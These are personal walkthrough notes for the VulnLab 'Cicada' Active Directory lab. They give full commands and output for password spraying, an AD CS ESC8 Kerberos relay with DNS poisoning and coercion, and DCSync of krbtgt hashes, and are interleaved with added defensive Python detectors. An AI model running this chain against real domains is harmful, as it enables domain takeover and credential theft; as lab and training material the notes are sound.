Cicada

This is not a writeup, just my notes about VulnLabs machines.


Last updated 1 month ago

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username       Password    Method                         Scope
Rosie.Powell   Cicada123   Password Spraying + Kerberos   Domain User

✅ Valid Usernames

Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie.Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West

🔑 Passwords list

Cicada123

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Wed Apr  9 17:10:36 2025 as: nmap -sS -Pn -n -p- -T5 --open -A -oN ext_tcp_cicada_10.10.123.255 -vvv 10.10.123.255
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-09 21:17:07Z)
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
2049/tcp  open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49203/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65409/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65447/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65465/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Initial enumeration

DNS

  • Not vulnerable to DNS Zone Transfer.

SMB (enum4linux-ng)

  • Domain: cicada.vl

  • FQDN: DC-JPQ225.cicada.vl

NFS

❯ showmount -e 10.10.123.255
Export list for 10.10.123.255:
/profiles (everyone)
❯ mkdir profiles 
❯ sudo mount -t nfs 10.10.123.255:/profiles profiles -o nolock

Inside the profiles directory there are folders named after possible usernames and two images, one of which contains a possible password.

User brute forcing

STATUS_NOT_SUPPORTED: NTLM authentication is disabled; instead, Kerberos authentication is used.

When NTLM is disabled and Kerberos is enabled, you must target the FQDN rather than the IP address: Kerberos needs the host name to build the service principal name for the ticket request.

nxc smb 10.10.123.255 -u users.txt -p 'Cicada123'
SMB         10.10.123.255   445    10.10.123.255    [*]  x64 (name:10.10.123.255) (domain:10.10.123.255) (signing:True) (SMBv1:False)
SMB         10.10.123.255   445    10.10.123.255    [-] 10.10.123.255\Administrator:Cicada123 STATUS_NOT_SUPPORTED
...
...

Brute forcing with Kerberos authentication

❯ nxc smb DC-JPQ225.cicada.vl -u users.txt -p 'Cicada123' -k
<SNIP>
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [+] cicada.vl\Rosie.Powell:Cicada123 
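A defender's view of the spray above: each Kerberos attempt in that sweep lands on the domain controller as event 4771 (Kerberos pre-authentication failed, status 0x18 for a wrong password) for every miss and as event 4768 (TGT issued) for the one hit, so the signal is one source failing against many distinct accounts in a short window, not many failures against one account. The following Python is an added example, not part of these notes, that runs that detection over constructed event summaries; the one-line summary format, the threshold of five accounts and the five-minute window are assumptions.

```python
"""Flag Kerberos password spraying from constructed 4771/4768 event summaries.

Added example (not from the original notes). Each line is a constructed,
simplified summary of a DC security event:
    <time> <event id> <account> <client ip> <status>
4771 = Kerberos pre-authentication failed (status 0x18 = wrong password)
4768 = TGT issued (the guess that worked)
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source tries one password against many accounts
# within seconds; a second source has a single, ordinary typo.
SAMPLE_EVENTS = """\
2025-04-09T21:17:01Z 4771 Daniel.Marshall 10.8.5.48 0x18
2025-04-09T21:17:01Z 4771 Debra.Wright 10.8.5.48 0x18
2025-04-09T21:17:02Z 4771 Jane.Carter 10.8.5.48 0x18
2025-04-09T21:17:02Z 4771 Jordan.Francis 10.8.5.48 0x18
2025-04-09T21:17:03Z 4771 Joyce.Andrews 10.8.5.48 0x18
2025-04-09T21:17:03Z 4771 Katie.Ward 10.8.5.48 0x18
2025-04-09T21:17:04Z 4768 Rosie.Powell 10.8.5.48 0x0
2025-04-09T21:17:04Z 4771 Shirley.West 10.8.5.48 0x18
2025-04-09T21:30:00Z 4771 Megan.Simpson 10.8.5.77 0x18
2025-04-09T21:31:00Z 4768 Megan.Simpson 10.8.5.77 0x0
"""


def parse_events(text):
    """Parse the constructed summary format into a list of dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, client, status = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(event_id),
            "account": account.lower(),
            "client": client,
            "status": status,
        })
    return events


def detect_spray(events, threshold=5, window=timedelta(minutes=5)):
    """Return {client_ip: sorted accounts} for every source that produced
    pre-auth failures for at least `threshold` distinct accounts inside
    some `window`-long interval. Spraying is "many accounts, few passwords",
    so distinct accounts per source is the signal, not failures per account."""
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] == 4771 and e["status"] == "0x18":
            failures[e["client"]].append((e["time"], e["account"]))
    flagged = {}
    for client, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            in_window = {acct for t, acct in fails[i:] if t - start <= window}
            if len(in_window) >= threshold:
                flagged[client] = sorted({acct for _, acct in fails})
                break
    return flagged


def guessed_accounts(events, flagged):
    """Accounts that then obtained a TGT (4768) from a flagged source:
    the credentials the spray actually found, which need a password reset."""
    return sorted({e["account"] for e in events
                   if e["event_id"] == 4768 and e["client"] in flagged})


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    hits = detect_spray(evts)
    for src, accounts in hits.items():
        print(f"spray from {src}: {len(accounts)} accounts tried")
    print("compromised:", guessed_accounts(evts, hits))
```

On the constructed input the single typo from 10.8.5.77 is ignored, 10.8.5.48 is flagged for seven accounts in three seconds, and Rosie.Powell is reported as the account whose password the spray found.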

Requesting a TGT ticket

❯ impacket-getTGT cicada.vl/Rosie.Powell:'Cicada123' -dc-ip 10.10.123.255 -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Rosie.Powell.ccache
❯ export KRB5CCNAME=~/Documents/Cicada/Content/Rosie.Powell.ccache   # tilde must stay unquoted so the shell expands it

Discovering Vulnerable Certificate Templates (ESC8)

❯ certipy-ad find -k -no-pass -vulnerable -stdout -ns 10.10.123.255 -dc-ip DC-JPQ225.cicada.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA
[!] Got error while trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'cicada-DC-JPQ225-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 7AB6BA064BFB22904C868758AF2017D2
    Certificate Validity Start          : 2025-04-09 21:05:46+00:00
    Certificate Validity End            : 2525-04-09 21:15:46+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates
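The two settings that Certipy reports above, Web Enrollment enabled and Request Disposition set to Issue, are exactly the pair that makes a CA ESC8-exposed: an HTTP enrollment endpoint that accepts relayed authentication plus a CA that issues the relayed request without manager approval. The following Python is an added example, not part of these notes and not Certipy's own code; it parses Certipy-style CA output and evaluates that pair, using two constructed CA blocks, the first mirroring the settings shown above and the second the same CA with Web Enrollment disabled.

```python
"""Parse Certipy-style CA enumeration output and evaluate ESC8 exposure.

Added example (not part of the notes and not Certipy's own code). The two
CA blocks below are constructed: the first mirrors the settings shown in
the enumeration above, the second is the same CA after remediation.
"""

VULNERABLE_CA = """\
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
"""

HARDENED_CA = """\
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
"""


def parse_ca_block(text):
    """Turn 'Key : Value' lines into a dict with lower-cased keys."""
    settings = {}
    for line in text.splitlines():
        if " : " not in line:
            continue
        key, value = line.split(" : ", 1)
        settings[key.strip().lower()] = value.strip()
    return settings


def esc8_findings(ca):
    """Return the conditions that together make the CA ESC8-exposed.

    ESC8 needs both conditions at once: a web enrollment endpoint to relay
    to, and a CA that issues the relayed request without review. One of
    the two alone is reported as an empty list (no ESC8 exposure)."""
    findings = []
    if ca.get("web enrollment", "").lower() == "enabled":
        findings.append("Web Enrollment is enabled (HTTP endpoint can receive relayed authentication)")
    if ca.get("request disposition", "").lower() == "issue":
        findings.append("Request Disposition is Issue (requests are not held for manager approval)")
    return findings if len(findings) == 2 else []


def is_esc8(ca):
    """True when the parsed CA settings show ESC8 exposure."""
    return bool(esc8_findings(ca))


if __name__ == "__main__":
    for label, block in (("before", VULNERABLE_CA), ("after", HARDENED_CA)):
        ca = parse_ca_block(block)
        print(label, ca["ca name"], "ESC8:", is_esc8(ca))
        for f in esc8_findings(ca):
            print("  -", f)
```

Removing the web enrollment role is the simplest fix when nothing uses it; where it must stay, the Microsoft guidance is to serve it over HTTPS only with Extended Protection for Authentication enabled, so a relayed Kerberos or NTLM authentication is rejected at the endpoint.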

Compromise Domain Controller from Linux

Adding Malicious DNS Record

#Adding DNS using dnstool
python3 dnstool.py -k -u 'cicada.vl\Rosie.Powell' -p 'Cicada123' -r 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' -d 10.8.5.48 -a add DC-JPQ225.cicada.vl -dns-ip 10.10.72.89
#Adding DNS using bloodyAD
bloodyAD -k --host DC-JPQ225.cicada.vl -d cicada.vl -u Rosie.Powell -p 'Cicada123' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.5.48

Setting Up krbrelayx Environment

❯ git clone https://github.com/dirkjanm/krbrelayx.git
❯ cd krbrelayx
❯ python3 -m venv env
❯ source env/bin/activate

Launching krbrelayx Attack

Format: HOSTNAME1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
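Because any authenticated user can create records in an AD-integrated zone by default, the record added above is visible to a defender as a dnsNode whose name is a real host name with a marshalled blob appended and whose A record points somewhere the real host does not live. The following Python is an added example, not part of these notes and not krbrelayx code, that scans a constructed zone dump for such names and ranks them; the record list, the computer list and the expected network are constructed, and treating the leading `1UWhRC` as the marker of the marshalled blob is an assumption drawn from the format line above.

```python
"""Spot relay-style DNS records: a real host name with a marshalled
target-information blob appended, pointing at a foreign address.

Added example (not part of the notes, not krbrelayx's code). The record
list, computer list and expected network are constructed for the demo;
treating the leading '1UWhRC' as the marker of the marshalled blob is an
assumption drawn from the 'Format:' line in the notes.
"""
import ipaddress
import re

# host part (non-greedy), then the marshalled blob in a base64-like
# alphabet running to the end of the record name
MARSHALLED_NAME = re.compile(
    r"^(?P<host>[A-Za-z0-9-]+?)(?P<blob>1UWhRC[A-Za-z0-9#\-]{20,})$")

# Constructed zone dump: (dnsNode name, A record data)
SAMPLE_DNS_NODES = [
    ("dc-jpq225", "10.10.123.255"),
    ("ws01", "10.10.123.40"),
    ("dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA", "10.8.5.48"),
    ("printer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA", "10.10.123.50"),
]
# Constructed list of computer accounts in the domain
SAMPLE_COMPUTERS = {"DC-JPQ225", "WS01"}
# Constructed: the only network that hosts in this zone should live in
EXPECTED_NETWORK = ipaddress.ip_network("10.10.0.0/16")


def find_marshalled_records(nodes, computers, expected_network=EXPECTED_NETWORK):
    """Return one finding per record whose name carries a marshalled blob.

    `impersonates` is the host a client ends up authenticating to once the
    blob is stripped; `known_host` says whether that is a real computer
    account; `foreign_target` says whether the record points outside the
    expected network, i.e. at a relay host rather than the real machine.
    """
    known = {c.upper() for c in computers}
    findings = []
    for name, data in nodes:
        m = MARSHALLED_NAME.match(name)
        if not m:
            continue
        host = m.group("host").upper()
        findings.append({
            "record": name,
            "impersonates": host,
            "known_host": host in known,
            "foreign_target": ipaddress.ip_address(data) not in expected_network,
        })
    return findings


def high_priority(findings):
    """Records that impersonate a real computer account and point outside
    the expected network: remove these first and investigate who created them."""
    return [f for f in findings if f["known_host"] and f["foreign_target"]]


if __name__ == "__main__":
    found = find_marshalled_records(SAMPLE_DNS_NODES, SAMPLE_COMPUTERS)
    for f in found:
        print(f)
    print("high priority:", [f["record"] for f in high_priority(found)])
```

Beyond a one-off scan, the creation itself is loggable: DNS Server audit events and directory-change auditing on the zone's dnsNode objects both show which account added the record, which here would be the low-privileged user rather than a DNS administrator.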

python krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$' 2>/dev/null
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80

[*] Setting up DNS Server
[*] Servers started, waiting for connections

Triggering Coercion via DFS

❯ KRB5CCNAME='Rosie.Powell.ccache' python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl
#Output generated from previous krbrelayx.py and dfscoerce.py steps.
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 15
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file

Path: Certipy-ad tool

Retrieving domain controller NT Hash

❯ certipy-ad auth -username 'DC-JPQ225$' -pfx DC-JPQ225\$.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f

Requesting domain controller Ticket Granting Ticket

❯ impacket-getTGT cicada.vl/'dc-jpq225$' -hashes 'aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in dc-jpq225$.ccache

Performing DCSync Attack against domain controller

❯ KRB5CCNAME='dc-jpq225$.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.72.89 -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... 

Path: PKINITtools tools

Requesting TGT Using PKINIT and PFX Certificate

Use a Python virtual environment and install the PKINITtools requirements first.

❯ python gettgtpkinit.py -cert-pfx ../krbrelayx/DC-JPQ225\$.pfx 'cicada.vl/DC-JPQ225$' dc.ccache
2025-04-14 00:20:51,783 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-14 00:20:52,087 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-14 00:20:52,443 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-14 00:20:52,443 minikerberos INFO     5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
INFO:minikerberos:5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
2025-04-14 00:20:52,445 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Dumping Domain Secrets with secretsdump

❯ KRB5CCNAME='dc.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... 

Compromise Domain Controller from Windows

Setting up DNS

Joining the domain.

Launching RemoteKrbRelay attack

PS C:\Temp> RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082071f06...
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, Confidentiality, UseDceStyle, Connection
[+] Received Kerberos Auth from dc-jpq225.cicada.vl with ticket on http/dc-jpq225.cicada.vl
[*] apRep2: 6f5b305...
[+] HTTP session established
[+] Cookie ASPSESSIONIDSSDRDQTA=IHPNGIODCGPMFFNKEE...; path=/
[+] Lets get certificate for "cicada.vl\dc-jpq225$" using "DomainController" template
[+] Success (ReqID: 17)

Writing the base64 string into a file.

echo -ne "MIIC8DCCAdigAwIBAgI<SNIP>" | base64 -d > cert.p12

Obtaining Domain Controller NT Hash

certipy auth -pfx cert.p12 -dc-ip 10.10.104.125 -domain cicada.vl
export KRB5CCNAME=dc-jpq225.ccache

[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f

Performing DCSync Attack against Domain Controller.

❯ KRB5CCNAME='dc-jpq225$.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.72.89 -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31